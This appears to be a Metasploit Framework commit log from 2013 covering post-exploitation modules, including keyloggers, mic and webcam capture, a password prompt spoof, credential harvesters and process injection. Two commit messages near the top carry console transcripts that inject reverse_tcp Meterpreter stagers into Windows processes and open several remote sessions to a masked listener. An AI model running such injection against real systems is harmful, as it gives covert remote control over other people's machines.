378f403fab
Land #2453 , Add stdapi_net_resolve_host(s) to Python Meterpreter.
...
Moves resolve_host post module to multi and depreciates Windows module.
Resolve will now return nil for failed lookups instead of an empty
string.
2013-10-10 20:13:06 +01:00
9ca9b4ab29
Merge branch 'master' into data_dir
...
Conflicts:
lib/msf/core/auxiliary/jtr.rb
2013-10-10 19:55:26 +01:00
d208ab9260
Added multiple payload capabilities
...
Added support to specify multiple payload delivery options.
msf post(payload_inject) > show options
Module options (post/windows/manage/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AMOUNT 2 no Select the amount of shells you want to spawn.
HANDLER false no Start an Exploit Multi Handler to receive the connection
LHOST XXXXXXXX yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
OPTIONS #<Msf::OptInt:0x007f5c6439c6d8> no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
PAYLOAD windows/meterpreter/reverse_tcp no Windows Payload to inject into memory of a process.
PID no Process Identifier to inject of process to inject payload.
SESSION 1 yes The session to run this module on.
msf post(payload_inject) > set HANDLER true
HANDLER => true
msf post(payload_inject) > exploit
[*] Running module against XXXXXXXX
[*] Starting exploit multi handler
[*] Performing Architecture Check
[*] Started reverse handler on XXXXXXXX:4433
[*] Starting the payload handler...
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884
[*] Opening process 884
[*] Generating payload
[*] Allocating memory in procees 884
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[*] Sending stage (770048 bytes) to XXXXXXXX
[+] Successfully injected payload in to process: 884
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884
[*] Opening process 884
[*] Generating payload
[*] Allocating memory in procees 884
[*] Allocated memory at address 0x00ba0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 884
[*] Post module execution completed
msf post(payload_inject) > [*] Meterpreter session 2 opened (XXXXXXXX:4433 -> XXXXXXXX:2962) at 2013-10-09 21:54:25 -0400
[*] Sending stage (770048 bytes) to XXXXXXXX
msf post(payload_inject) > [*] Meterpreter session 3 opened (XXXXXXXX:4433 -> XXXXXXXX:2963) at 2013-10-09 21:54:27 -0400
2013-10-09 22:01:11 -04:00
bec239abf1
Added ability to generate multiple payloads - not just one
...
Ran into a pentest recently where I had a flaky meterpreter shell, had it launch multiple ones just to be safe. The amount datastore allows you to iterate through and spawn multiple sessions.
msf exploit(psexec) > use post/windows/manage/multi_meterpreter_inject
msf post(multi_meterpreter_inject) > show options
Module options (post/windows/manage/multi_meterpreter_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AMOUNT 1 no Select the amount of shells you want to spawn.
HANDLER false no Start new multi/handler job on local box.
IPLIST XXXXXXXXX yes List of semicolom separated IP list.
LPORT 4444 no Port number for the payload LPORT variable.
PAYLOAD windows/meterpreter/reverse_tcp no Payload to inject in to process memory
PIDLIST no List of semicolom separated PID list.
SESSION yes The session to run this module on.
msf post(multi_meterpreter_inject) > set AMOUNT 5
AMOUNT => 5
msf post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf post(multi_meterpreter_inject) > set SESSION 1
SESSION => 1
msf post(multi_meterpreter_inject) > exploit
[*] Running module against XXXXXXXXX
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5400
[*] Injecting meterpreter into process ID 5400
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5400
[*] Meterpreter session 2 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4991) at 2013-10-09 18:04:02 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4136
[*] Injecting meterpreter into process ID 4136
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4136
[*] Meterpreter session 3 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4992) at 2013-10-09 18:04:08 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4108
[*] Injecting meterpreter into process ID 4108
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4108
[*] Meterpreter session 4 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4993) at 2013-10-09 18:04:13 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5788
[*] Injecting meterpreter into process ID 5788
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5788
[*] Meterpreter session 5 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4994) at 2013-10-09 18:04:19 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1408
[*] Injecting meterpreter into process ID 1408
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1408
[*] Meterpreter session 6 opened (XXXXXXXXX:4444 -> XXXXXXXXX:1029) at 2013-10-09 18:04:24 -0400
[*] Post module execution completed
msf post(multi_meterpreter_inject) >
2013-10-09 18:11:09 -04:00
be139beb20
Remove windows from title of multi module.
2013-10-09 17:11:47 -04:00
6c382c8eb7
Return nil on error, and move the module to post/multi.
2013-10-09 16:52:53 -04:00
c2c6422078
Correct the name of "DynDNS" (not Dyn-DNS)
2013-10-09 09:56:07 -05:00
7d0cf73af7
Fix multi-meter_inject error msg
...
Was trying to coerce the exception class
to string rather than calling .message
Results in a stacktrace.
FIXRM #8460
2013-10-08 11:11:38 -05:00
4266b88a20
Move author name to just 'joev'
...
[See #2476 ]
2013-10-07 12:50:04 -05:00
c460f943f7
Merge branch 'master' into data_dir
...
Conflicts:
modules/exploits/windows/local/always_install_elevated.rb
plugins/sounds.rb
scripts/meterpreter/powerdump.rb
scripts/shell/spawn_meterpreter.rb
2013-10-02 20:17:11 +01:00
4dc88cf60f
Expand descriptions for ease of use.
2013-09-30 13:30:31 -05:00
7cc2ad55a6
Land #1770 , unattend.xml snarfing modules
2013-09-27 16:04:38 -05:00
d869b1bb70
Unless, unless everywhere.
2013-09-27 15:55:57 -05:00
ae655e42d2
Touchups: boolean check, unless, and TODO comment
2013-09-27 15:54:03 -05:00
37e4d58f4a
Call CSV text/plain so it can be viewed normally
...
Otherwise, things parsing through the loot table will treat it as binary
data, and not display it in a normal texty way, even though it's totally
readable with just a little squinting.
2013-09-27 15:48:48 -05:00
5e77dccd48
Add a ref to an example unattend.xml
2013-09-27 15:45:57 -05:00
7ba846ca24
Find and replace
2013-09-26 20:34:48 +01:00
2eff44d7e1
Swap x64/x86 detection
2013-09-24 20:01:45 +01:00
b6fd14fd66
Use meterp dns lookup
2013-09-24 19:58:09 +01:00
f1e563d375
Merge branch 'master' of github.com:rapid7/metasploit-framework into enum_ad_perf
2013-09-24 19:08:52 +01:00
f47d4d7927
Revert change for resolve_hosts after #2415
2013-09-24 12:47:00 -05:00
7eecf7e6f0
Land #2415 , @Meatballs1's fix for resolve_hosts platform list
2013-09-24 12:37:03 -05:00
c547e84fa7
Prefer Ruby style for single word collections
...
According to the Ruby style guide, %w{} collections for arrays of single
words are preferred. They're easier to type, and if you want a quick
grep, they're easier to search.
This change converts all Payloads to this format if there is more than
one payload to choose from.
It also alphabetizes the payloads, so the order can be more predictable,
and for long sets, easier to scan with eyeballs.
See:
https://github.com/bbatsov/ruby-style-guide#collections
2013-09-24 12:33:31 -05:00
4b4ab3a6a0
Remove Linux Plat from ResolveHosts
2013-09-24 12:00:53 -05:00
8db1a389eb
Land #2304 fix post module require order
...
Incidentally resolve conflict on current_user_psexec to account for the
new powershell require.
2013-09-23 16:52:23 -05:00
e885ab45b6
Land #1734 Metasploit side for ip resolv
2013-09-23 16:18:40 -05:00
9a555d8701
Fix the modules added since the branch
2013-09-17 18:25:12 -05:00
150f0f644e
Merge branch 'rapid7' into bug/osx-mods-load-order
...
Conflicts:
modules/post/windows/gather/enum_dirperms.rb
2013-09-17 18:21:13 -05:00
84f015320a
Probably helps to use the right alternate exploit name.
2013-09-12 16:16:49 -05:00
14577441ca
Deprecates windows persistence post module.
2013-09-12 16:10:48 -05:00
58b634dd27
Remove unnecessary requires from post mods
2013-09-12 14:36:01 -05:00
41f23d5268
Fix merge fail
...
The whitespace fixes from @tabassassin somehow hosed this change.
See
845bf7146b6daa90a4a5
2013-09-11 16:22:35 -05:00
4f1db80c24
Fix requires in new post modules
2013-09-10 11:13:07 -05:00
aff35a615b
Grammar fixes in descriptions
2013-09-09 15:09:53 -05:00
ffa600ff8b
Fix really the check method
2013-09-06 10:21:18 -05:00
9b9e1592fd
Retab changes
2013-09-06 10:13:38 -05:00
a64f960bfc
Merge for retab
2013-09-06 10:12:55 -05:00
d9fed860a5
Fix check method
2013-09-06 10:11:06 -05:00
b3b8cee870
Retab changes for PR #1473
2013-09-05 16:19:05 -05:00
0ba4e1da65
Merge for retab
2013-09-05 16:18:56 -05:00
2e9096d427
Retab changes for PR #1734
2013-09-05 14:59:41 -05:00
322ed35bb4
Merge for retab
2013-09-05 14:59:34 -05:00
2846a5d680
Retab changes for PR #1770
2013-09-05 14:57:40 -05:00
269c1a26cb
Merge for retab
2013-09-05 14:57:32 -05:00
26b8364dcb
Retab changes for PR #1789
2013-09-05 14:44:21 -05:00
789be1fe3e
Merge for retab
2013-09-05 14:44:14 -05:00
b720fc215b
Retab changes for PR #1910
2013-09-05 14:40:18 -05:00
fc8ad8c633
Merge for retab
2013-09-05 14:40:11 -05:00
c5daf939d1
Stabs tabassassin
2013-09-05 20:36:52 +01:00
845bf7146b
Retab changes for PR #2304
2013-09-05 13:41:25 -05:00
adf9ff356c
Merge for retab
2013-09-05 13:41:23 -05:00
9f3a5dc5d0
Retab new modules
2013-09-04 12:32:53 -05:00
999b802468
Merge branch 'master' into retab/rumpus
2013-09-04 12:32:05 -05:00
a8e77c56bd
Updates
2013-09-03 22:46:20 +01:00
cc838401fb
Land #2314 , metasploit_pcaplog title correction
2013-09-03 15:21:00 -06:00
b9ceed0c53
Land #2313 , lockout_keylogger title correction
2013-09-03 15:20:20 -06:00
ac0c493cf9
Merge branch 'master' of github.com:rapid7/metasploit-framework into local_win_priv_keyring
2013-09-03 21:33:11 +01:00
84aaf2334a
Retab new material
2013-09-03 11:47:26 -05:00
0c1e6546af
Update from master
2013-09-03 11:45:39 -05:00
6daa90a4a5
Msftidy: use binary on File.open always
...
msftidy is complaining, here:
keylog_recorder.rb:116 - [WARNING] File.open without binary mode
Not sure how this managed to hit upstream/master with msftidy warnings.
Protip, use an msftidy pre-commit hook. We have just such a hook script
in tools/dev, as a matter of fact, so it's just a symlink away:
https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
2013-09-03 10:35:50 -05:00
8acabe457c
Trailing whitespace fixup
2013-09-03 10:32:48 -05:00
ca8dacb93b
Minor module description updates for grammar.
2013-09-03 10:31:45 -05:00
bcc0152274
Correct metasploit_pcaplog's naming style
...
The naming style nazi is in town. ph33r.
2013-08-31 18:25:06 -05:00
a4bcc1f82f
Correct module naming style
...
You know what it is.
2013-08-31 18:17:06 -05:00
41e4375e43
Retab modules
2013-08-30 16:28:54 -05:00
63adde2429
Fix load order in posts, hopefully forever
2013-08-29 13:37:50 -05:00
66886eed7a
Land #2283 , @bmerinofe's post module for PortProxy Port Forwarding
2013-08-28 17:34:14 -05:00
f477711268
Provide more information about installing IPv6
2013-08-28 17:22:50 -05:00
43badfaa1c
Move the check_ipv6 call to the run metod
2013-08-28 17:20:11 -05:00
05863cb1cc
Delete vague exception handling only done on one place
2013-08-28 17:17:05 -05:00
6b8c7cbe24
Omit parentheses for method call with no args
2013-08-28 17:15:28 -05:00
c04e6b2b14
Reduce code complexity on check_ipv6
2013-08-28 17:13:21 -05:00
f339510816
Use OptPort
2013-08-28 17:10:22 -05:00
ad8b6ec1ef
Avoid redefine builtin datastore options
2013-08-28 17:08:22 -05:00
ad1b9fbaef
Use datastore options to avoid complex logic around args
2013-08-28 17:00:10 -05:00
c68986e6eb
Favor unless over if not
2013-08-28 16:50:44 -05:00
3a2a2a9cc0
Beautify metadata
2013-08-28 16:48:36 -05:00
c31a2332be
Juan changes applied
2013-08-28 19:53:54 +02:00
1042dbe56a
Land #2108 , @jiuweigui's post module to get info from prefetch files
2013-08-28 10:01:06 -05:00
0fbe411be7
Ensure use Ruby File
2013-08-28 09:55:21 -05:00
5c32bb4a8e
Beautify metadata
2013-08-28 09:32:23 -05:00
4f8ba82d02
Make gather_pf_info return a prefetch entry
2013-08-28 09:29:49 -05:00
904bd12663
Fix print over nil or empty string
2013-08-28 09:27:18 -05:00
ef3085823c
Use default timeout value
2013-08-28 09:26:46 -05:00
8ac82b8b18
Beautify timezone_key_values function
2013-08-28 09:25:49 -05:00
bc593aab4f
Avoid confusion between variable and method name
2013-08-28 09:24:32 -05:00
f823290a4c
Add nc check. Prints successful binary match.
...
* kills session nil check
2013-08-27 17:21:18 -05:00
13996b98cf
Correct action description for recording
...
The correct description is recording
2013-08-27 12:39:46 -05:00
a91b38cbf4
Land #2276 - osx webcam and record_mic post modules
2013-08-27 12:28:14 -05:00
067b8f3c59
Adds session existence check. Moves error log path to datastore option.
2013-08-27 11:44:21 -05:00
8a8f80e097
Move error log path to datastore option.
2013-08-27 11:43:20 -05:00
728d0a0e65
Land #2240 - OSX keylogger
2013-08-27 11:36:58 -05:00
a9459ef703
Update module title for naming style consistency
2013-08-27 11:36:26 -05:00
16ace44f2d
Move keylogger.rb to post/osx/capture/keylog_recorder
...
To match the naming consistency with Windows
2013-08-27 11:35:00 -05:00
5cc4ef09d1
Move previous error log path to method. Renames the #check method.
2013-08-27 11:25:00 -05:00
87c03237a9
Fix discrepencies between unix/osx with whereis cmd.
2013-08-27 03:17:14 -05:00
98b21471ed
fix some bugs in cups_root_file_read module.
2013-08-27 03:03:08 -05:00
2b577552a2
OptEnum option changed
2013-08-26 15:25:23 +02:00
64d21c7216
added portproxy post meterpreter module
2013-08-26 14:44:41 +02:00
34404ee067
Commit cups module. Tested on osx 10.7, 10.8, and unpatched ubuntu 12.0.4.
2013-08-25 14:30:11 -05:00
2ebfdcc84b
Fix to description
2013-08-24 19:32:01 +03:00
73f4259156
Fix based on suggestions
2013-08-24 19:14:48 +03:00
2d3f599498
Moves ruby_dl helpers to proper place in repo.
...
* Adds fail_with methods and moves timeouts to constants.
2013-08-23 17:17:19 -05:00
ba00395cfd
Set filename to osx_mic_rec instead of webcam.
2013-08-23 15:52:24 -05:00
6c4ad6a976
Move modules to post/osx/manage.
2013-08-23 15:38:58 -05:00
c3b98262bf
Seriously ,stop writing things to my desktop.
2013-08-23 15:16:41 -05:00
7ebe6635ea
Finish fixing ruby 1.8.7 regressions. Works on 10.8 and 10.7.
2013-08-23 15:06:48 -05:00
514d2b4721
Fix to make msftidy happy.
2013-08-21 21:46:44 +03:00
0cc499faf7
Minor deletes related to filetime change.
2013-08-21 14:47:50 +03:00
3a2433dac9
Remove unneeded filetime read
2013-08-21 12:18:07 +03:00
86d6bce8c4
[FixRM #8312 ] - Fix file handle leaks
...
Fix file handle leaks for [SeeRM #8312 ]
2013-08-18 20:31:13 -05:00
f843743294
Adds fixes from @wchen-r7.
2013-08-18 18:46:51 -05:00
017309d02d
Minor fixes to keylogger.
2013-08-18 16:29:34 -05:00
1cdf77df7d
OSX keylogger module finally working.
2013-08-18 16:21:38 -05:00
0063d4e06c
Extend description & add Win2k3 section to WinXP section.
2013-08-16 14:44:08 +03:00
8602e744da
Add support for Win2k3
2013-08-16 02:46:16 +03:00
83a179ff08
[Fix RM 8224] - undefined method `include?' for nil:NilClass
...
Bug due to registry_enumkeys returning nil.
2013-08-15 16:04:35 -05:00
bce50d1b05
Land #2220 - OSX Password Prompt Spoof
2013-08-13 22:15:14 -05:00
919e0d1901
MSF license, make use of print_good
2013-08-13 22:14:35 -05:00
e1856651bc
Incorporate the suggested edits from the PR review.
...
* Rewrites helpers to just use cmd_exec, since that works in meterpreter and shell.
* Changes _EOF_ to EOF, since that threw a harmless error in shell
commits
* Prefer using Post mixin API instead of rolling-own implementation
* Fixes whitespace
[SeeRM #5940 ]
2013-08-13 19:35:55 -05:00
99ef714d00
Updates pps description.
2013-08-13 19:35:55 -05:00
52fa000211
Get password_prompt_spoof module working. [RM #5940 ]
2013-08-13 19:35:55 -05:00
c9799c1ee6
Land #2212 - Change migrate order & print target_pid
2013-08-13 18:56:54 -05:00
73e9bf9fa8
Merge branch 'bug/smart_migrate' of github.com:/dmaloney-r7/metasploit-framework into bug/smart_migrate
...
Conflicts:
modules/post/windows/manage/smart_migrate.rb
2013-08-13 13:56:01 -05:00
6be4d9e583
missing interpolation
2013-08-13 13:52:44 -05:00
ebd485349f
Retab smart_migrate.rb module
...
Retabs completely for PR #2212
2013-08-12 20:23:33 -05:00
bfb5040dbf
Remove deprecated modules
...
These three modules are well over their deprecation dates. Making good
on that threat now.
* service_permissions: Marked for removal on 2013-01-10
* bypassuac: Marked for removal on 2013-01-04
* ms10_092_schelevator: Marked for removal on 2013-06-01
2013-08-12 11:21:45 -05:00
c9bd791ff6
fix smart_migrate choice order
...
was trying winlogon first
should do explorer first
2013-08-12 11:02:27 -05:00
021c358159
Land #2203 - Fix regex for x64 detection
2013-08-09 13:23:38 -05:00
7178633140
Fixed architecture detection in bypassuac modules
2013-08-09 03:42:02 +02:00
a7c80ebfc2
Land #2185 , @bmerinofe's post module for dns cache dumping
2013-08-08 12:49:37 -05:00
8431eb7a79
Msftidy fixes, also use correct possessive plurals
...
http://englishplus.com/grammar/00000132.htm
2013-08-05 09:43:38 -05:00
98c8c16803
Change offset values and hostname length
2013-08-05 12:29:54 +02:00
3e6de5d2e9
added a post-exploitation module to dump the cache dns entries
2013-08-03 13:37:32 +02:00
1b6f6b8bf0
Land #2168 again
...
Adding Dhiru's module back now that things are straight.
2013-07-29 22:10:25 -05:00
7e539332db
Reverting disaster merge to 593363c5f with diff
...
There was a disaster of a merge at 6f37cf22eb593363c5f9
2013-07-29 21:47:52 -05:00
300781823d
Undo bad landing
...
This reverts commit e624ed18ad593363c5f9
2013-07-29 17:39:12 -05:00
b29d18d8b8
Merge branch 'ecryptfs-creds' of https://github.com/kholia/metasploit-framework
2013-07-29 16:41:41 -05:00
8379225e9b
make msftidy happy (hopefully)
2013-07-29 23:42:29 +05:30
2de0a3e0f9
Add information gathering module for eCryptfs
2013-07-28 23:09:42 +05:30
e828517ed8
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-22 17:10:45 -05:00
b4589c3c82
Expanding description
2013-07-22 15:19:30 -05:00
aa159f12b7
changed options wording
2013-07-22 11:15:22 -07:00
57055ab754
added optional option
2013-07-22 11:13:29 -07:00
6bcdd37223
logged resolve_hostname to db
2013-07-19 11:14:14 -07:00
f3bb0ec1ee
moved table <<
2013-07-17 02:53:24 +03:00
c0e594eb6a
removed unnecessary begin-end
2013-07-16 20:09:21 +03:00
9985ea3c3a
Enumerates Windows Prefetch files through meterpreter session
2013-07-16 14:18:54 +03:00
e13f4f5b4e
Minor fix
2013-07-16 13:46:42 +03:00
ef82308e07
Working versio
2013-07-16 12:45:03 +03:00
b32597620d
Finally working.
2013-07-16 04:07:28 +03:00
5f3d3a3956
still buggy
2013-07-16 01:05:08 +03:00
4c56d8eba3
Still buggy
2013-07-15 23:55:24 +03:00
315874a882
Minor fixes
2013-07-15 23:19:17 +03:00
5d767fe319
Minor mods
2013-07-15 19:34:44 +03:00
26f28ae47e
Minor cleaup
2013-07-15 17:51:55 +03:00
2349ee7276
Working version
2013-07-15 16:07:45 +03:00
4801aab4c4
loot.txt broken
2013-07-15 15:38:42 +03:00
4265141a11
minor modifications
2013-07-15 13:15:39 +03:00
90107b82e1
Minor mods
2013-07-15 00:19:32 +03:00
6956003949
Everything working on this version.
2013-07-14 17:24:27 +03:00
52f9daf8c5
Renamed prefetch_tool to enum_prefetch
2013-07-14 15:33:54 +03:00
6539b4e507
Working
2013-07-14 15:30:54 +03:00
b77ba64e88
Fixed WinXP registry timezone key
2013-07-14 13:53:18 +03:00
398d5070b2
Fixed WinXP registry timezone key
2013-07-14 06:18:25 +03:00
43740d7626
Minor edits
2013-07-14 04:55:57 +03:00
742615f3a1
Working
2013-07-14 04:50:13 +03:00
1f27a2b7bd
Working version
2013-07-14 04:32:20 +03:00
ae60abd05b
Minor changes
2013-07-13 20:19:01 +03:00
45d49cdfe5
Time conversion broken, otherwise works.
2013-07-13 20:03:08 +03:00
1f10d1ca05
Done. Needs final cleanup and rewrite.
2013-07-13 13:24:08 +03:00
84f30b2379
Works. Needs just FILETIME converter
2013-07-12 23:31:52 +03:00
ce8f3d2a62
Tested on XP and Win7. Works, needs just Filetime convert
2013-07-12 23:29:54 +03:00
5692cde57a
Initial transfer
2013-07-12 21:19:44 +03:00
6dec81cbdf
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-06 10:38:19 -05:00
b2e7f61814
Fix path build on total_commander
2013-07-06 10:15:30 -05:00
df7209f28a
Land #2067 , @wchen-r7's fix for total_commander
2013-07-06 10:14:44 -05:00
39f0359fa4
Land #2061 , @wchen-r7's fix to make bitcoin_jacker use post mixins
2013-07-06 00:14:14 -05:00
ca4e11c112
Use check_other more
2013-07-05 12:38:38 -05:00
98f49758af
Don't need this line
2013-07-05 12:34:26 -05:00
d3000c0066
These funcs want 'filename'
2013-07-05 12:29:16 -05:00
353db0884d
Use expand_path from Msf::Post::File
2013-07-05 12:26:59 -05:00
18e5831ca8
Don't use begin/rescue to shut errors up and call it "file not found"
2013-07-05 12:22:05 -05:00
dc90904e50
Avoid misleading error
2013-07-05 12:12:30 -05:00
c859129339
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-05 12:06:05 -05:00
bcf6d11442
Land #2049 , @wchen-r7's had_pid? method work
2013-07-05 11:19:11 -05:00
6477c6995d
Merge branch 'enum_db_no_method' of https://github.com/wchen-r7/metasploit-framework
2013-07-05 09:35:34 -05:00
a7d110367a
Land #2064 , @wchen-r7's fix for access uninitialized variable on enum_services
2013-07-05 09:30:23 -05:00
b9dd3df05f
Land #2068 , @wchen-r7's fix to initialize variables on windows_autologin module
2013-07-05 09:09:17 -05:00
4ed6a4d8d1
Land #2062 , @wchen-r7's fix to avoid redundant check
2013-07-05 08:51:05 -05:00
1ad4482ce2
Land #2069 , @wchen-r7's patch to print info when using store_loot
2013-07-05 08:35:57 -05:00
c459b0e937
Land #2045 , @wchen-r7's fix for memory_grep module
2013-07-05 08:16:47 -05:00
2a32b59c88
Forgot to change var 'filename'
2013-07-05 01:37:35 -05:00
84050241f0
Fix target ID
2013-07-05 01:25:08 -05:00
1352731062
Make heap grep optional
2013-07-05 00:57:25 -05:00
a52d38f359
Land #2052 - Fix regex
2013-07-03 16:55:07 -05:00
ff49cc1c4f
[SeeRM:#8135] - Be able to show where store_loot saves a file
...
If you don't print where store_loot saves the file, it can be a
pain in the butt to find it sometimes.
2013-07-03 12:29:01 -05:00
70c472fb7e
[FixRM:#8134] - Handle registry_getvaldata return value properly
...
registry_getvaldata can return nil, can't always assume it's
gonna throw a string.
2013-07-03 12:23:14 -05:00
1064c050de
[FixRM:#8132] - Fix undefined method '+' in total_commander.rb
...
The return value of registry_getvaldata can return nil when a
RequestError occurs, so you can't always assume it's gonna throw
you a string.
2013-07-03 12:10:23 -05:00
27653b661f
[FixRM:#8131] & [FixRM:#8133] - Fix Base64 func usage
...
Instead of using Base64, these modules should use Rex.
2013-07-03 12:06:12 -05:00
c40a605495
[FixRM:#8129] - Fix undefined method error in enum_services.rb
...
srv_conf may not have the 'Startup' key because it's only assigned
in service_info() when srvstart is 4, therefore it's possible to
cause an undefined method 'downcase' error.
2013-07-03 11:44:28 -05:00
534858a23b
[FixRM:#8128] - Potential undefined method 'include' for nil
...
A lot of return values aren't checked, may result in undefined method X
bugs. The same type of issue is all over the place.
2013-07-03 11:40:24 -05:00
6198409e71
[FixRM:#8127] - Remove junk code that checks ARTIFACTS again
...
ARTIFACTS uses OptPath, which already checks the path. We don't need
to do this again.
2013-07-03 11:33:25 -05:00
944761a1dc
[FixRM:#8126] - Use functions from Msf::Post::File
...
Some functions already exist in Msf::Post::File, should use them.
2013-07-03 11:30:05 -05:00
864f4e9d37
post/local_admin_search_enum~Regex fails,module 2
...
If the regex fails then the entire moudle would too
2013-07-03 00:43:08 +01:00
a74f706bdb
These modules should check PID before using it
2013-07-02 14:48:04 -05:00
6815eef8f4
Fix multiple issues with memory_grep
...
This fixes the following:
[FixRM:#8118] - Allows the module to be able to enumerate from
multiple processes with the same name.
[FixRM:#8120] - Allows the module to be able to actually read data
from the heap.
2013-07-01 18:57:00 -05:00
1865e6c19d
Fix requrires for enable_support_account
2013-07-01 16:22:39 -05:00
be1a0d3cae
Land #2041 , title and description cleanup
2013-07-01 15:55:13 -05:00
bc24f99f8d
Various description and title updates
2013-07-01 15:37:37 -05:00
1c6657ee86
Land #2034 , @wchen-r7's patch for memory_grep
2013-07-01 13:34:57 -05:00
43c4f07e06
Use "unless"
...
Guidelines favor "unless".
2013-06-30 18:32:15 -05:00
520a78e2c8
Add final cleanup for enable_support_account
2013-06-29 23:30:29 -05:00
df88ace6d1
Land #1989 , @salcho's post module for enable windows support account
2013-06-29 23:29:16 -05:00
8717a3b7d8
using post mixins, fixed checks, module renamed
2013-06-29 15:44:36 -05:00
00bf9070aa
using post mixins, fixed checks, module renamed
2013-06-29 15:41:36 -05:00
82eed1582f
No need for the 2nd element
2013-06-28 17:05:43 -05:00
a7ee95381b
Updates module description, and uses the proper func for hex dump
...
As an user, it's important to know that using this module may result
a lost session because it must migrate to grep memory, but does not
migrate back.
The module also has its own hex dump routine, which is no longer
needed because we have a built-in Rex::Text.to_hex_dump
2013-06-28 16:28:00 -05:00
f158e421fa
Add requires for pptp_tunnel
2013-06-28 10:07:52 -05:00
ecfe083b0e
Correct module naming style
...
I was just looking at these modules on the web gui, and these names
need to be fixed to maintain style consistency.
2013-06-25 00:26:53 -05:00
36c3460911
changed reference
2013-06-20 18:02:25 -05:00
c1994db2a7
shorter title, included msf::post mixins, added reference and overall readability
2013-06-20 17:42:38 -05:00
ef56e48274
Fix datastore name
2013-06-20 22:22:00 +01:00
6c62463f83
Add ipv6 resolution and remove nix
2013-06-20 22:17:31 +01:00
db935498ab
admin_me modified according to msftidy
2013-06-19 18:14:32 -05:00
8afbcd6931
added admin_me.rb as post->manage script
2013-06-19 17:54:13 -05:00
f91719bf80
Do final cleanup for pptp_tunnel
2013-06-19 14:21:48 -05:00
3e31d2c97a
Land #1820 , @bmerinofe post module for pptpd mitm
2013-06-19 14:19:50 -05:00
f478eb51cf
s/disable/disabled/
2013-06-16 21:27:45 +02:00
1953473e1f
added advanced option
2013-06-10 16:09:31 -04:00
a9df55c27a
Add Windows 2012 to regex matching
2013-06-09 20:46:44 -04:00
8e83f0ee30
Add Windows 8 and 2012 to regex matching
2013-06-09 20:41:46 -04:00
bc7066a8b6
added user warnings
2013-06-06 08:02:32 -04:00
182863f1a4
addressing feedback/updated description
2013-06-04 17:15:42 -04:00
e70221a993
Land #1903 - Add decryptioin for firefox_creds
2013-06-04 11:38:03 -05:00
cb31772302
Fix indent
2013-06-04 11:37:16 -05:00
423a33b1fc
Added firefox pw decryption support
2013-06-03 13:13:59 -04:00
ed5b8895bb
Fixes smart_migrate for a TypeError bug
...
Bug is: TypeError can't convert Rex::RuntimeError into String
[SeeRM: #7984 ]
2013-05-28 18:45:49 -05:00
f4498c3916
Remove $Id tags
...
Also adds binary coding magic comment to a few files
2013-05-20 16:21:03 -05:00
a96efb5f0d
Small tidy
2013-05-18 16:21:00 +01:00
a96739951b
Filter out system users
2013-05-18 16:18:34 +01:00
eb46b09708
Timeout condition change
2013-05-14 00:35:42 +02:00
b8826396ee
Cosmetic changes
2013-05-12 23:03:28 +02:00
b10d216db2
Fix indent
2013-05-12 21:06:26 +01:00
37efad46bb
Address feedback and reporting
2013-05-12 20:50:53 +01:00
ba5d6fc259
Added post module to get a MITM through a pptp tunnel
2013-05-12 16:27:43 +02:00
55fc1458de
Simplify and clean up some
...
I'd really love to make this work on Linux as well, since it's really
just a file grabber/parser. Unfortunately, the Post API for enumerating
users and homedirs isn't great for cross-platform stuff like this.
A few small changes, all verified on Windows 7:
* Reuse the key storing code instead of copy-paste with minor changes
* Use binary mode when opening the stored prefs
* Don't bother checking for incognito since we're using `steal_token`
anyway
* Check for existence of directories instead of guessing based on OS
match
2013-05-10 16:58:35 -05:00
84ff72eb92
use file_exist? instead of fs.file.stat
2013-05-10 11:17:42 -04:00
25f7af43b4
use gsub instead of split/join
2013-05-10 11:12:56 -04:00
2f543d3080
extension and pref parsing
2013-05-09 13:23:28 -04:00
b0f5255de8
fix ssh_creds username
...
ssh_creds post module as not saving
the username in the cred objects
2013-05-05 16:31:28 -05:00
7fb092c58c
Initial commit
2013-05-02 22:08:19 +01:00
567d2bb14b
